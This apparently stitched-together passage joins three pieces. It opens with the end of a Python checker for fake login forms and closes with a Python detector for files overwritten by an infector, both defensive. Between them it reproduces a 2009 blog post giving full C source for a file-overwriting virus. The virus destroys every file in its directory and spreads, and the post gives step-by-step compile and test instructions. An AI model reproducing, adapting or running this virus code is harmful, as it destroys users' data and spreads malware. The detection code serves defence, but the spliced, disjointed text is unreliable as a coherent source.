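        if tag == "form":
            self._current = None


def credential_form_targets(page_url, html):
    """For each form that collects a password, resolve where it submits and
    flag the two things a fake login page gets wrong: posting to a host other
    than the page's own, and posting over plain http."""
    collector = _FormCollector()
    collector.feed(html)
    page_host = urlsplit(page_url).hostname
    report = []
    for form in collector.forms:
        if not form["has_password"]:
            continue
        target = urlsplit(urljoin(page_url, form["action"]))
        report.append({
            "action": target.geturl(),
            "cross_origin": target.hostname != page_host,
            "plain_http": target.scheme != "https",
        })
    return report


# Constructed pages; every hostname is a placeholder.
GENUINE_PAGE = """<form method="post" action="/signin">
<input name="user"><input type="password" name="pw"><input type="submit"></form>"""

FAKE_PAGE = """<form method="post" action="http://collector.example.net/grab.php">
<input name="user"><input type="PASSWORD" name="pw"><input type="submit"></form>"""


if __name__ == "__main__":
    for page in (GENUINE_PAGE, FAKE_PAGE):
        print(credential_form_targets("https://accounts.example.com/login", page))
```

A clone that posts to its own server trips cross_origin only if you compare against the host the user believes they are on, so in a real check the page_url should be the address the user typed or clicked, not one the page itself reports; and a clone hosted on the attacker's own domain is caught by the address bar, not by this parser.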
I hope this info has helped you.
This post is only for educational purposes and I am not responsible for any of the harm due to it....

Aug 1, 2009

A VIRUS IN C


This program is an example of how to create a virus in C. It demonstrates a simple virus which, upon execution (running), copies itself over the other files in its directory, destroying them by infecting them. An infected file is itself capable of spreading the infection to another file, and so on. Here's the source code of the virus program. Note that it is written against Borland's 16-bit DOS libraries: findfirst/findnext and struct ffblk come from dir.h, clrscr and getch from conio.h, fcloseall from Borland's stdio.h and CLK_TCK from time.h, so it will not build unchanged with a modern compiler.

FILE *virus,*host;
int done,a=0;
unsigned long x;            /* size of the virus EXE in bytes; must match the built file (see compiling method) */
char buff[2048];
struct ffblk ffblk;         /* Borland findfirst/findnext record (dir.h) */
clock_t st,end;
void main()
{
st=clock();
clrscr();
done=findfirst("*.*",&ffblk,0);      /* every file in the current directory is a candidate host */
while(!done)
{
virus=fopen(_argv[0],"rb");          /* the running executable is the source image */
host=fopen(ffblk.ff_name,"rb+");
if(host==NULL)
goto next;
x=89088;
printf("Infecting %s\n",ffblk.ff_name,a);
while(x>2048)                        /* overwrite the first x bytes of the host with the virus image */
{
fread(buff,2048,1,virus);
fwrite(buff,2048,1,host);
x-=2048;
}
fread(buff,x,1,virus);
fwrite(buff,x,1,host);
a++;
next:
{
fcloseall();
done=findnext(&ffblk);
}
}
printf("DONE! (Total Files Infected= %d)",a);
end=clock();
printf("TIME TAKEN=%f SEC\n", (end-st)/CLK_TCK);
getch();
}
COMPILING METHOD: BORLAND TC++ 3.0 (16-BIT):
1. Load the program in the compiler, press Alt-F9 to compile
2. Press F9 to generate the EXE file (DO NOT PRESS CTRL-F9, THIS WILL INFECT ALL THE FILES IN THE CURRENT DIRECTORY INCLUDING YOUR COMPILER)
3. Note down the size of the generated EXE file in bytes (SEE EXE FILE PROPERTIES FOR ITS SIZE)
4. Change the value of x in the source code to the noted size (IN THE ABOVE SOURCE CODE x=89088; CHANGE IT)
5. Once again follow STEP 1 & STEP 2. Now the generated EXE file is ready to infect
BORLAND C++ 5.5 (32-BIT):
1. Compile once, note down the generated EXE file length in bytes
2. Change the value of x in the source code to this length in bytes
3. Recompile it. The new EXE file is ready to infect
HOW TO TEST:
1. Open a new empty folder
2. Put some EXE files in it (BY SEARCHING FOR *.EXE AND PASTING THEM INTO THE NEW FOLDER)
3. Run the virus EXE file there; you will see all the files in the current directory get infected.
4. All the infected files will be ready to reinfect
That’s it
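Because the infector above writes its own image over the first x bytes of every file it touches (x being its own size, 89088 in the post), every victim ends up with the same leading x bytes. That gives a defender a simple detector: files in a directory that share an identical long prefix are almost certainly overwritten hosts, since unrelated executables share only a short header. The added Python example below (mine, not part of the post) implements that check; demo() builds a constructed corpus in a temporary directory with a random 4096-byte stand-in image rather than any real binary.

```python
import hashlib
import os
import tempfile


def leading_digest(path, n):
    """SHA-256 of the first n bytes of a file."""
    with open(path, "rb") as f:
        return hashlib.sha256(f.read(n)).hexdigest()


def find_prefix_clones(directory, n, min_group=2):
    """Group the files in `directory` whose first n bytes are identical.

    Returns {digest: [file names]} for every group with at least `min_group`
    members. An overwriting infector copies its own image over the front of
    each host, so every victim starts with the same n bytes (n = the
    infector's size); files shorter than n cannot have been hit and are skipped.
    """
    groups = {}
    for name in sorted(os.listdir(directory)):
        path = os.path.join(directory, name)
        if os.path.isfile(path) and os.path.getsize(path) >= n:
            groups.setdefault(leading_digest(path, n), []).append(name)
    return {d: names for d, names in groups.items() if len(names) >= min_group}


def demo():
    """Constructed corpus in a temp dir: three files that all begin with the
    same 4096-byte image and two that do not. Returns (number of clone
    groups, members of the first group)."""
    image = b"MZ" + os.urandom(4094)              # stand-in for an infector image
    with tempfile.TemporaryDirectory() as d:
        for i in range(3):
            with open(os.path.join(d, f"hit{i}.exe"), "wb") as f:
                f.write(image + os.urandom(500 * (i + 1)))   # overwritten host, its own tail left
        for i in range(2):
            with open(os.path.join(d, f"clean{i}.exe"), "wb") as f:
                f.write(b"MZ" + os.urandom(6000))            # untouched file, unique content
        clones = find_prefix_clones(d, len(image))
        return len(clones), sorted(next(iter(clones.values())))


if __name__ == "__main__":
    print(demo())
```

The same idea underlies signature scanning: once one overwritten host is known, its leading-bytes digest identifies every other victim on the disk, and because the original file contents under the prefix are gone, the only recovery is restoring from backup.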